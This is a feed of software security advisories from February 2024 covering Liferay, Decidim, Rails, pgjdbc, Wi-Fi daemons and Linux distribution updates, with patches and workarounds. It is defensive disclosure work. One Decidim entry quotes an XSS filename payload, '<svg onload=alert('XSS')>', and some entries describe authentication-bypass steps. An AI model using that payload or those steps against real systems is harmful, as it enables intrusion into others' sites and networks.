22.02.2024 01:29:35	maven	[MAVEN:GHSA-CR36-3VQF-X5W5] Liferay Portal Expando module and Liferay DXP vulnerable to stored Cross-site Scripting (critical)	Stored cross-site scripting (XSS) vulnerability in Expando module's geolocation custom fields in Liferay Portal 7.2.0 through 7.4.2, and older unsupported versions, and Liferay DXP 7.3 before service pack 3, 7.2 before fix pack 17, and older unsupported versions allows remote authenticated users to inject arbitrary web script or HTML via a crafted payload injected into the name text field of a geolocation custom field.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-CR36-3VQF-X5W5
22.02.2024 01:29:25	maven	[MAVEN:GHSA-V2XQ-M22W-JMPR] Liferay Portal and Liferay DXP's Users Admin module vulnerable to stored Cross-site Scripting (critical)	Stored cross-site scripting (XSS) vulnerability in Users Admin module's edit user page in Liferay Portal 7.2.0 through 7.4.2, and older unsupported versions, and Liferay DXP 7.3 before service pack 3, 7.2 before fix pack 17, and older unsupported versions allows remote authenticated users to inject arbitrary web script or HTML via a crafted payload injected into an organization’s “Name” text field	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-V2XQ-M22W-JMPR
22.02.2024 01:28:51	maven	[MAVEN:GHSA-XPJG-7HX7-WGCX] Liferay Portal and Liferay DXP vulnerable to Cross-site Scripting (critical)	Cross-site scripting (XSS) vulnerability in HtmlUtil.escapeJsLink in Liferay Portal 7.2.0 through 7.4.1, and older unsupported versions, and Liferay DXP 7.3 before service pack 3, 7.2 before fix pack 15, and older unsupported versions allows remote attackers to inject arbitrary web script or HTML via crafted javascript: style links.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-XPJG-7HX7-WGCX
22.02.2024 01:28:35	maven	[MAVEN:GHSA-P28X-4R5H-PH6J] Liferay Portal Message Board widget and Liferay DXP vulnerable to stored Cross-site Scripting (critical)	Stored cross-site scripting (XSS) vulnerability in Message Board widget in Liferay Portal 7.2.0 through 7.4.2, and older unsupported versions, and Liferay DXP 7.3 before service pack 3, 7.2 before fix pack 17, and older unsupported versions allows remote authenticated users to inject arbitrary web script or HTML via the filename of an attachment.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-P28X-4R5H-PH6J
21.02.2024 23:06:26	rubysec	[RUBYSEC:DECIDIM-2023-47634] Race condition in Endorsements (low)	"### Impact\n\nA race condition in the endorsement of resources (forinstance, a proposal) allows a user to make more than once endorsement.\n\nTo exploitthis vulnerability, the request to set an endorsement must be sent several timesin parallel.\n \n### Workarounds\n\nDisable the Endorsement feature in the components. "	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:DECIDIM-2023-47634
21.02.2024 23:06:26	rubysec	[RUBYSEC:DECIDIM-ADMIN-2023-48220] Possibility to circumvent the invitation token expiry period (medium)	### ImpactThe invites feature allows users to accept the invitation for anunlimited amount of time through the password reset functionality.When using the password reset functionality, the `devise_invitable`gem always accepts the pending invitation if the user has beeninvited as shown in this piece of code within the `devise_invitable` gem:https://github.com/scambra/devise_invitable/blob/41f58970ff76fb64382a9b9ea1bd530f7c3adab2/lib/devise_invitable/models.rb#L198The only check done here is if the user has been invited but the codedoes not ensure that the pending invitation is still valid as definedby the `invite_for` expiry period as explained in the gem's documentation:https://github.com/scambra/devise_invitable#model-configuration-> `invite_for`: The period the generated invitation token is valid.After this period, the invited resource won’t be able to accept theinvitation. When `invite_for` is `0` (the default), the invitation won’t expire.Decidim sets this configuration to `2.weeks` so this configurationshould be respected:https://github.com/decidim/decidim/blob/d2d390578050772d1bdb6d731395f1afc39dcbfc/decidim-core/config/initializers/devise.rb#L134The bug is in the `devise_invitable` gem and should be fixed thereand the dependency should be upgraded in Decidim once the fix becomes available.### PatchesUpdate `devise_invitable` to version `2.0.9` or above by running the following command:```$ bundle update devise_invitable```### WorkaroundsThe invitations can be cancelled directly from the database byrunning the following command from the Rails console:```> Decidim::User.invitation_not_accepted.update_all(invitation_token: nil)```### ReferencesOWASP ASVS V4.0.3-2.3.1This bug has existed in the `devise_invitable` gem since this commitwhich was first included in the `v0.4.rc3` release of this gem:https://github.com/scambra/devise_invitable/commit/94d859c7de0829bf63f679ae5dd3cab2b866a098All versions since then are affected.This gem was first introduced at its version `~> 1.7.0` to the`decidim-admin` gem in this commit which was first included inthe `v0.0.1.alpha3` release of Decidim:https://github.com/decidim/decidim/commit/073e60e2e4224dd81815a784002ebba30f2ebb34It was first introduced at its version `~> 1.7.0` to the `decidim-system`gem in this commit which was also first included in the `v0.0.1.alpha3`release of Decidim:https://github.com/decidim/decidim/commit/b12800717a689c295a9ea680a38ca9f823d2c454### CreditsThis issue was discovered in City of Helsinki's security audit againstDecidim 0.27 done during September 2023. The security audit wasimplemented by [Deloitte Finland](https://www2.deloitte.com/fi/fi.html).	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:DECIDIM-ADMIN-2023-48220
21.02.2024 23:06:26	rubysec	[RUBYSEC:DECIDIM-CORE-2023-51447] Cross-site scripting (XSS) in the dynamic file uploads (medium)	### ImpactThe dynamic file upload feature is subject to potential XSS attach in case the attacker manages to modify the file names of the records being uploaded to the server.This appears in sections where the user controls the file upload dialogs themselves and has the technical knowledge to change the file names through the dynamic upload endpoint. Therefore I believe it would require the attacker to control the whole session of the particular user but in any case, this needs to be fixed.Successful exploit of this vulneratibility would require the user to have successfully uploaded a file blob to the server with a malicious file name and then have the possibility to direct the other user to the edit page of the record where the attachment is attached.The users are able to craft the direct upload requests themselves controlling the file name that gets stored to the database as shown here:https://github.com/rails/rails/blob/a967d355c6fee9ad9b8bd115d43bc8b0fc207e7e/activestorage/app/controllers/active_storage/direct_uploads_controller.rb#L14The attacker is able to change the filename e.g. to `<svg onload=alert('XSS')>` if they know how to craft these requests themselves. And then enter the returned blob ID to the form inputs manually by modifying the edit page source.Therefore, anywhere we display these strings, we should properly escape them.### PatchesPR #11612 fixes this problem both for 0.28.dev and 0.27.x.### WorkaroundsDisable dynamic uploads for the instance, e.g. from proposals.### ReferencesOWASP ASVS v4.0.3-5.1.3### CreditsThis issue was discovered in City of Helsinki's security audit against Decidim 0.27 done during September 2023. The security audit was implemented by [Deloitte Finland](https://www2.deloitte.com/fi/fi.html).	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:DECIDIM-CORE-2023-51447
21.02.2024 23:06:26	rubysec	[RUBYSEC:DECIDIM-SYSTEM-2023-48220] Possibility to circumvent the invitation token expiry period (medium)	### ImpactThe invites feature allows users to accept the invitation for an unlimited amount of time through the password reset functionality.When using the password reset functionality, the `devise_invitable` gem always accepts the pending invitation if the user has been invited as shown in this piece of code within the `devise_invitable` gem:https://github.com/scambra/devise_invitable/blob/41f58970ff76fb64382a9b9ea1bd530f7c3adab2/lib/devise_invitable/models.rb#L198The only check done here is if the user has been invited but the code does not ensure that the pending invitation is still valid as defined by the `invite_for` expiry period as explained in the gem's documentation:https://github.com/scambra/devise_invitable#model-configuration-> `invite_for`: The period the generated invitation token is valid. After this period, the invited resource won’t be able to accept the invitation. When `invite_for` is `0` (the default), the invitation won’t expire.Decidim sets this configuration to `2.weeks` so this configuration should be respected:https://github.com/decidim/decidim/blob/d2d390578050772d1bdb6d731395f1afc39dcbfc/decidim-core/config/initializers/devise.rb#L134The bug is in the `devise_invitable` gem and should be fixed there and the dependency should be upgraded in Decidim once the fix becomes available.### PatchesUpdate `devise_invitable` to version `2.0.9` or above by running the following command:```$ bundle update devise_invitable```### WorkaroundsThe invitations can be cancelled directly from the database by running the following command from the Rails console:```> Decidim::User.invitation_not_accepted.update_all(invitation_token: nil)```### ReferencesOWASP ASVS V4.0.3-2.3.1This bug has existed in the `devise_invitable` gem since this commit which was first included in the `v0.4.rc3` release of this gem:https://github.com/scambra/devise_invitable/commit/94d859c7de0829bf63f679ae5dd3cab2b866a098All versions since then are affected.This gem was first introduced at its version `~> 1.7.0` to the `decidim-admin` gem in this commit which was first included in the `v0.0.1.alpha3` release of Decidim:https://github.com/decidim/decidim/commit/073e60e2e4224dd81815a784002ebba30f2ebb34It was first introduced at its version `~> 1.7.0` to the `decidim-system` gem in this commit which was also first included in the `v0.0.1.alpha3` release of Decidim:https://github.com/decidim/decidim/commit/b12800717a689c295a9ea680a38ca9f823d2c454### CreditsThis issue was discovered in City of Helsinki's security audit against Decidim 0.27 done during September 2023. The security audit was implemented by [Deloitte Finland](https://www2.deloitte.com/fi/fi.html).	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:DECIDIM-SYSTEM-2023-48220
21.02.2024 23:06:26	rubysec	[RUBYSEC:DECIDIM-TEMPLATES-2023-47635] Possible CSRF attack at questionnaire templates preview (medium)	### ImpactThe CSRF authenticity token check is currently disabled for the questionnaire templates preview as per:https://github.com/decidim/decidim/blob/3187bdfd40ea1c57c2c12512b09a7fec0b2bed08/decidim-templates/app/controllers/decidim/templates/admin/questionnaire_templates_controller.rb#L11This was introduced by this commit in the PR that introduced this feature (#6247):https://github.com/decidim/decidim/pull/6247/commits/5542227be66e3b6d7530f5b536069bce09376660The issue does not imply a serious security thread as you need to have access also to the session cookie in order to see this resource. This URL does not allow modifying the resource but it may allow attackers to gain access to information which was not meant to be public.### Patches#11743### WorkaroundsDisable the templates functionality or remove all available templates.### References#11743	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:DECIDIM-TEMPLATES-2023-47635
21.02.2024 23:06:26	rubysec	[RUBYSEC:DECIDIM-2023-48220] Possibility to circumvent the invitation token expiry period (medium)	### ImpactThe invites feature allows users to accept the invitation for an unlimited amount of time through the password reset functionality.When using the password reset functionality, the `devise_invitable` gem always accepts the pending invitation if the user has been invited as shown in this piece of code within the `devise_invitable` gem:https://github.com/scambra/devise_invitable/blob/41f58970ff76fb64382a9b9ea1bd530f7c3adab2/lib/devise_invitable/models.rb#L198The only check done here is if the user has been invited but the code does not ensure that the pending invitation is still valid as defined by the `invite_for` expiry period as explained in the gem's documentation:https://github.com/scambra/devise_invitable#model-configuration-> `invite_for`: The period the generated invitation token is valid. After this period, the invited resource won’t be able to accept the invitation. When `invite_for` is `0` (the default), the invitation won’t expire.Decidim sets this configuration to `2.weeks` so this configuration should be respected:https://github.com/decidim/decidim/blob/d2d390578050772d1bdb6d731395f1afc39dcbfc/decidim-core/config/initializers/devise.rb#L134The bug is in the `devise_invitable` gem and should be fixed there and the dependency should be upgraded in Decidim once the fix becomes available.### PatchesUpdate `devise_invitable` to version `2.0.9` or above by running the following command:```$ bundle update devise_invitable```### WorkaroundsThe invitations can be cancelled directly from the database by running the following command from the Rails console:```> Decidim::User.invitation_not_accepted.update_all(invitation_token: nil)```### ReferencesOWASP ASVS V4.0.3-2.3.1This bug has existed in the `devise_invitable` gem since this commit which was first included in the `v0.4.rc3` release of this gem:https://github.com/scambra/devise_invitable/commit/94d859c7de0829bf63f679ae5dd3cab2b866a098All versions since then are affected.This gem was first introduced at its version `~> 1.7.0` to the `decidim-admin` gem in this commit which was first included in the `v0.0.1.alpha3` release of Decidim:https://github.com/decidim/decidim/commit/073e60e2e4224dd81815a784002ebba30f2ebb34It was first introduced at its version `~> 1.7.0` to the `decidim-system` gem in this commit which was also first included in the `v0.0.1.alpha3` release of Decidim:https://github.com/decidim/decidim/commit/b12800717a689c295a9ea680a38ca9f823d2c454### CreditsThis issue was discovered in City of Helsinki's security audit against Decidim 0.27 done during September 2023. The security audit was implemented by [Deloitte Finland](https://www2.deloitte.com/fi/fi.html).	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:DECIDIM-2023-48220
21.02.2024 23:06:26	rubysec	[RUBYSEC:DECIDIM-2023-51447] Cross-site scripting (XSS) in the dynamic file uploads (medium)	### ImpactThe dynamic file upload feature is subject to potential XSS attach in case the attacker manages to modify the file names of the records being uploaded to the server.This appears in sections where the user controls the file upload dialogs themselves and has the technical knowledge to change the file names through the dynamic upload endpoint. Therefore I believe it would require the attacker to control the whole session of the particular user but in any case, this needs to be fixed.Successful exploit of this vulneratibility would require the user to have successfully uploaded a file blob to the server with a malicious file name and then have the possibility to direct the other user to the edit page of the record where the attachment is attached.The users are able to craft the direct upload requests themselves controlling the file name that gets stored to the database as shown here:https://github.com/rails/rails/blob/a967d355c6fee9ad9b8bd115d43bc8b0fc207e7e/activestorage/app/controllers/active_storage/direct_uploads_controller.rb#L14The attacker is able to change the filename e.g. to `<svg onload=alert('XSS')>` if they know how to craft these requests themselves. And then enter the returned blob ID to the form inputs manually by modifying the edit page source.Therefore, anywhere we display these strings, we should properly escape them.### PatchesPR #11612 fixes this problem both for 0.28.dev and 0.27.x.### WorkaroundsDisable dynamic uploads for the instance, e.g. from proposals.### ReferencesOWASP ASVS v4.0.3-5.1.3### CreditsThis issue was discovered in City of Helsinki's security audit against Decidim 0.27 done during September 2023. The security audit was implemented by [Deloitte Finland](https://www2.deloitte.com/fi/fi.html).	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:DECIDIM-2023-51447
21.02.2024 23:06:26	rubysec	[RUBYSEC:DEVISE_INVITABLE-2023-48220] Possibility to circumvent the invitation token expiry period (medium)	### ImpactThe invites feature allows users to accept the invitation for an unlimited amount of time through the password reset functionality.When using the password reset functionality, the `devise_invitable` gem always accepts the pending invitation if the user has been invited as shown in this piece of code within the `devise_invitable` gem:https://github.com/scambra/devise_invitable/blob/41f58970ff76fb64382a9b9ea1bd530f7c3adab2/lib/devise_invitable/models.rb#L198The only check done here is if the user has been invited but the code does not ensure that the pending invitation is still valid as defined by the `invite_for` expiry period as explained in the gem's documentation:https://github.com/scambra/devise_invitable#model-configuration-> `invite_for`: The period the generated invitation token is valid. After this period, the invited resource won’t be able to accept the invitation. When `invite_for` is `0` (the default), the invitation won’t expire.Decidim sets this configuration to `2.weeks` so this configuration should be respected:https://github.com/decidim/decidim/blob/d2d390578050772d1bdb6d731395f1afc39dcbfc/decidim-core/config/initializers/devise.rb#L134The bug is in the `devise_invitable` gem and should be fixed there and the dependency should be upgraded in Decidim once the fix becomes available.### PatchesUpdate `devise_invitable` to version `2.0.9` or above by running the following command:```$ bundle update devise_invitable```### WorkaroundsThe invitations can be cancelled directly from the database by running the following command from the Rails console:```> Decidim::User.invitation_not_accepted.update_all(invitation_token: nil)```### ReferencesOWASP ASVS V4.0.3-2.3.1This bug has existed in the `devise_invitable` gem since this commit which was first included in the `v0.4.rc3` release of this gem:https://github.com/scambra/devise_invitable/commit/94d859c7de0829bf63f679ae5dd3cab2b866a098All versions since then are affected.This gem was first introduced at its version `~> 1.7.0` to the `decidim-admin` gem in this commit which was first included in the `v0.0.1.alpha3` release of Decidim:https://github.com/decidim/decidim/commit/073e60e2e4224dd81815a784002ebba30f2ebb34It was first introduced at its version `~> 1.7.0` to the `decidim-system` gem in this commit which was also first included in the `v0.0.1.alpha3` release of Decidim:https://github.com/decidim/decidim/commit/b12800717a689c295a9ea680a38ca9f823d2c454### CreditsThis issue was discovered in City of Helsinki's security audit against Decidim 0.27 done during September 2023. The security audit was implemented by [Deloitte Finland](https://www2.deloitte.com/fi/fi.html).	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:DEVISE_INVITABLE-2023-48220
22.02.2024 01:18:26	maven	[MAVEN:GHSA-XFG6-62PX-CXC2] Duplicate Advisory: SQL injection in pgjdbc (critical)	## Duplicate AdvisoryThis advisory has been withdrawn because it is a duplicate of GHSA-24rp-q3w6-vc56. This link is maintained to preserve external references.## Original Descriptionpgjdbc, the PostgreSQL JDBC Driver, allows attacker to inject SQL if using PreferQueryMode=SIMPLE. Note this is not the default. In the default mode there is no vulnerability. A placeholder for a numeric value must be immediately preceded by a minus. There must be a second placeholder for a string value after the first placeholder; both must be on the same line. By constructing a matching string payload, the attacker can inject SQL to alter the query,bypassing the protections that parameterized queries bring against SQL Injection attacks. Versions before 42.7.2, 42.6.1, 42.5.5, 42.4.4, 42.3.9, and 42.2.8 are affected.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-XFG6-62PX-CXC2
22.02.2024 19:15:08	alpinelinux	[ALPINE:CVE-2023-52160] wpa_supplicant vulnerability	[From CVE-2023-52160] The implementation of PEAP in wpa_supplicant through 2.10 allows authentication bypass. For a successful attack, wpa_supplicant must be configured to not verify the network's TLS certificate during Phase 1 authentication, and an eap_peap_decrypt vulnerability can then be abused to skip Phase 2 authentication. The attack vector is sending an EAP-TLV Success packet instead of starting Phase 2. This allows an adversary to impersonate Enterprise Wi-Fi networks.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-52160
22.02.2024 19:15:08	alpinelinux	[ALPINE:CVE-2023-52161] iwd vulnerability	[From CVE-2023-52161] The Access Point functionality in eapol_auth_key_handle in eapol.c in iNet wireless daemon (IWD) before 2.14 allows attackers to gain unauthorized access to a protected Wi-Fi network. An attacker can complete the EAPOL handshake by skipping Msg2/4 and instead sending Msg4/4 with an all-zero key.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-52161
22.02.2024 15:15:07	alpinelinux	[ALPINE:CVE-2023-3966] openvswitch vulnerability (high)	[From CVE-2023-3966] A flaw was found in Open vSwitch where multiple versions are vulnerable to crafted Geneve packets, which may result in a denial of service and invalid memory accesses. Triggering this issue requires that hardware offloading via the netlink path is enabled.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2023-3966
22.02.2024 05:11:39	ubuntu	[USN-6649-1] Firefox vulnerabilities	Several security issues were fixed in Firefox.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6649-1
22.02.2024 03:12:32	ubuntu	[USN-6648-1] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6648-1
22.02.2024 02:00:00	cisa	[CISA-2024:0222] CISA Adds One Known Exploited Vulnerability to Catalog (critical)	CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise.	https://secdb.nttzen.cloud/security-advisory/cisa/CISA-2024:0222
22.02.2024 02:00:00	debian	[DSA-5628-1] imagemagick (high)	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5628-1
22.02.2024 02:00:00	redhat	[RHSA-2024:0950] postgresql:15 security update (important)	PostgreSQL is an advanced object-relational database management system (DBMS).Security Fix(es):* postgresql: non-owner 'REFRESH MATERIALIZED VIEW CONCURRENTLY' executes arbitrary SQL (CVE-2024-0985)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0950
22.02.2024 02:00:00	redhat	[RHSA-2024:0951] postgresql security update (important)	PostgreSQL is an advanced object-relational database management system (DBMS).Security Fix(es):* postgresql: non-owner 'REFRESH MATERIALIZED VIEW CONCURRENTLY' executes arbitrary SQL (CVE-2024-0985)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0951
22.02.2024 02:00:00	redhat	[RHSA-2024:0952] firefox security update (important)	Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability.This update upgrades Firefox to version 115.8.0 ESR.Security Fix(es):* Mozilla: Out-of-bounds memory read in networking channels (CVE-2024-1546)* Mozilla: Alert dialog could have been spoofed on another site (CVE-2024-1547)* Mozilla: Memory safety bugs fixed in Firefox 123, Firefox ESR 115.8, and Thunderbird 115.8 (CVE-2024-1553)* Mozilla: Fullscreen Notification could have been hidden by select element (CVE-2024-1548)* Mozilla: Custom cursor could obscure the permission dialog (CVE-2024-1549)* Mozilla: Mouse cursor re-positioned unexpectedly could have led to unintended permission grants (CVE-2024-1550)* Mozilla: Multipart HTTP Responses would accept the Set-Cookie header in response parts (CVE-2024-1551)* Mozilla: Incorrect code generation on 32-bit ARM devices (CVE-2024-1552)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.	https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:0952
22.02.2024 02:00:00	freebsd	[FREEBSD:03BF5157-D145-11EE-ACEE-001B217B3468] Gitlab -- Vulnerabilities (high)	Gitlab reports: Stored-XSS in user's profile page User with "admin_group_members" permission can invite other groups to gain owner access ReDoS issue in the Codeowners reference extractor LDAP user can reset password using secondary email and login using direct authentication Bypassing group ip restriction settings to access environment details of projects through Environments/Operations Dashboard Users with the Guest role can change Custom dashboard projects settings for projects in the victim group Group member with sub-maintainer role can change title of shared private deploy keys Bypassing approvals of CODEOWNERS	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:03BF5157-D145-11EE-ACEE-001B217B3468
22.02.2024 21:52:37	almalinux	[ALSA-2024:0888] edk2 security update (low)	edk2 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0888
22.02.2024 21:10:16	almalinux	[ALSA-2024:0897] kernel security update (important)	kernel security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0897
22.02.2024 22:03:22	almalinux	[ALSA-2024:0887] go-toolset:rhel8 security update (moderate)	go-toolset:rhel8 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0887
22.02.2024 21:23:57	almalinux	[ALSA-2024:0893] python-pillow security update (important)	python-pillow security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0893
22.02.2024 21:31:36	almalinux	[ALSA-2024:0889] oniguruma security update (moderate)	oniguruma security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0889
22.02.2024 22:14:15	almalinux	[ALSA-2024:0861] gimp:2.8 security update (important)	gimp:2.8 security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:0861
23.02.2024 23:40:59	ubuntu	[USN-6653-1] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6653-1
23.02.2024 22:20:01	ubuntu	[USN-6652-1] Linux kernel (Azure) vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6652-1
23.02.2024 21:36:52	ubuntu	[USN-6651-1] Linux kernel vulnerabilities (high)	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6651-1
23.02.2024 20:57:31	msrc	[MS:CVE-2024-1676] Chromium: CVE-2024-1676 Inappropriate implementation in Navigation		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-1676
23.02.2024 20:57:29	msrc	[MS:CVE-2024-1675] Chromium: CVE-2024-1675 Insufficient policy enforcement in Download		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-1675
23.02.2024 20:57:27	msrc	[MS:CVE-2024-1674] Chromium: CVE-2024-1674 Inappropriate implementation in Navigation		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-1674
23.02.2024 20:57:25	msrc	[MS:CVE-2024-1673] Chromium: CVE-2024-1673 Use after free in Accessibility		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-1673
23.02.2024 20:57:23	msrc	[MS:CVE-2024-1672] Chromium: CVE-2024-1672 Inappropriate implementation in Content Security Policy		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-1672
23.02.2024 20:57:21	msrc	[MS:CVE-2024-1671] Chromium: CVE-2024-1671 Inappropriate implementation in Site Isolation		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-1671
23.02.2024 20:57:19	msrc	[MS:CVE-2024-1670] Chromium: CVE-2024-1670 Use after free in Mojo		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-1670
23.02.2024 20:57:15	msrc	[MS:CVE-2024-1669] Chromium: CVE-2024-1669 Out of bounds memory access in Blink		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-1669
23.02.2024 23:41:20	maven	[MAVEN:GHSA-RC6H-QWJ9-2C53] Apache DolphinScheduler vulnerable to arbitrary JavaScript execution as root for authenticated users (critical)	Improper Input Validation vulnerability in Apache DolphinScheduler. An authenticated user can cause arbitrary, unsandboxed JavaScript to be executed on the server.This issue is a legacy of CVE-2023-49299. We didn't fix it completely in CVE-2023-49299, and we added one more patch to fix it.This issue affects Apache DolphinScheduler: until 3.2.1.Users are recommended to upgrade to version 3.2.1, which fixes the issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-RC6H-QWJ9-2C53
23.02.2024 21:43:21	npm	[NPM:GHSA-2FC9-XPP8-2G9H] `@backstage/backend-common` vulnerable to path traversal through symlinks (high)	### ImpactPaths checks with the `resolveSafeChildPath` utility were not exhaustive enough, leading to risk of path traversal vulnerabilities if symlinks can be injected by attackers.### PatchesPatched in `@backstage/backend-common` version `0.21.1`.Patched in `@backstage/backend-common` version `0.20.2`.Patched in `@backstage/backend-common` version `0.19.10`.### For more informationIf you have any questions or comments about this advisory:- Open an issue in the [Backstage repository](https://github.com/backstage/backstage)- Visit our Discord, linked to in [Backstage README](https://github.com/backstage/backstage)	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-2FC9-XPP8-2G9H
23.02.2024 19:54:23	ubuntu	[USN-6650-1] Linux kernel (OEM) vulnerability (medium)	The system could be made to crash under certain conditions.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6650-1
23.02.2024 10:00:00	msrc	[MS:CVE-2024-21423] Microsoft Edge (Chromium-based) Information Disclosure Vulnerability (low)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-21423
23.02.2024 10:00:00	msrc	[MS:CVE-2024-26188] Microsoft Edge (Chromium-based) Spoofing Vulnerability (low)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26188
23.02.2024 10:00:00	msrc	[MS:CVE-2024-26192] Microsoft Edge (Chromium-based) Information Disclosure Vulnerability (important)		https://secdb.nttzen.cloud/security-advisory/msrc/MS:CVE-2024-26192
23.02.2024 20:03:50	maven	[MAVEN:GHSA-CCGV-VJ62-XF9H] Spring Web vulnerable to Open Redirect or Server Side Request Forgery (high)	Applications that use UriComponentsBuilder to parse an externally provided URL (e.g. through a query parameter) AND perform validation checks on the host of the parsed URL may be vulnerable to a open redirect attack or to a SSRF attack if the URL is used after passing validation checks.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-CCGV-VJ62-XF9H
23.02.2024 02:25:00	amazonlinux	[ALAS-2024-1922] Amazon Linux AMI 2014.03 - ALAS-2024-1922: important priority package update for sudo (important)		https://secdb.nttzen.cloud/security-advisory/amazonlinux/ALAS-2024-1922
23.02.2024 02:00:00	debian	[DSA-5630-1] thunderbird	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5630-1
23.02.2024 02:00:00	debian	[DSA-5629-1] chromium	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5629-1
23.02.2024 02:00:00	oraclelinux	[ELSA-2024-0951] postgresql security update (important)	[13.14-1.0.1]- Update to 13.14- Fixes CVE-2024-0985	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-0951
23.02.2024 01:41:00	amazonlinux	[ALAS2-2024-2473] Amazon Linux 2 2017.12 - ALAS2-2024-2473: important priority package update for sudo (important)		https://secdb.nttzen.cloud/security-advisory/amazonlinux/ALAS2-2024-2473
23.02.2024 02:00:00	freebsd	[FREEBSD:80AD6D6C-B398-457F-B88F-BF6BE0BBAD44] electron27 -- multiple vulnerabilities (critical)	Electron developers report: This update fixes the following vulnerability: Security: backported fix for CVE-2024-1283. Security: backported fix for CVE-2024-1284.	https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:80AD6D6C-B398-457F-B88F-BF6BE0BBAD44
25.02.2024 01:18:32	rubysec	[RUBYSEC:ACTIONPACK-2024-26142] Possible ReDoS vulnerability in Accept header parsing in Action Dispatch	There is a possible ReDoS vulnerability in the Accept header parsing routinesof Action Dispatch. This vulnerability has been assigned the CVE identifierCVE-2024-26142.Versions Affected: >= 7.1.0, < 7.1.3.1 Not affected: < 7.1.0 Fixed Versions: 7.1.3.1# ImpactCarefully crafted Accept headers can cause Accept header parsing inAction Dispatch to take an unexpected amount of time, possibly resulting in aDoS vulnerability. All users running an affected release should either upgradeor use one of the workarounds immediately.Ruby 3.2 has mitigations for this problem, so Rails applications usingRuby 3.2 or newer are unaffected.# ReleasesThe fixed releases are available at the normal locations.# WorkaroundsThere are no feasible workarounds for this issue.	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:ACTIONPACK-2024-26142
25.02.2024 01:21:33	rubysec	[RUBYSEC:ACTIONPACK-2024-26143] Possible XSS Vulnerability in Action Controller	There is a possible XSS vulnerability when using the translation helpers(`translate`, `t`, etc) in Action Controller. This vulnerability has beenassigned the CVE identifier CVE-2024-26143.Versions Affected: All. Not affected: None Fixed Versions: 7.1.3.1, 7.0.8.1# ImpactApplications using translation methods like `translate`, or `t` on acontroller, with a key ending in “_html”, a `:default` key which containsuntrusted user input, and the resulting string is used in a view, may besusceptible to an XSS vulnerability.For example, impacted code will look something like this:```class ArticlesController < ApplicationController def show @message = t("message_html", default: untrusted_input) # The `show` template displays the contents of `@message` endend```To reiterate the pre-conditions, applications must:* Use a translation function from a controller (i.e. not `I18n.t`, or`t` from a view)* Use a key that ends in `_html`* Use a default value where the default value is untrusted and unescaped input* Send the text to the victim (whether that’s part of a template, or a `render` call)All users running an affected release should either upgrade or use one of the workarounds immediately.# ReleasesThe fixed releases are available at the normal locations.# WorkaroundsThere are no feasible workarounds for this issue.	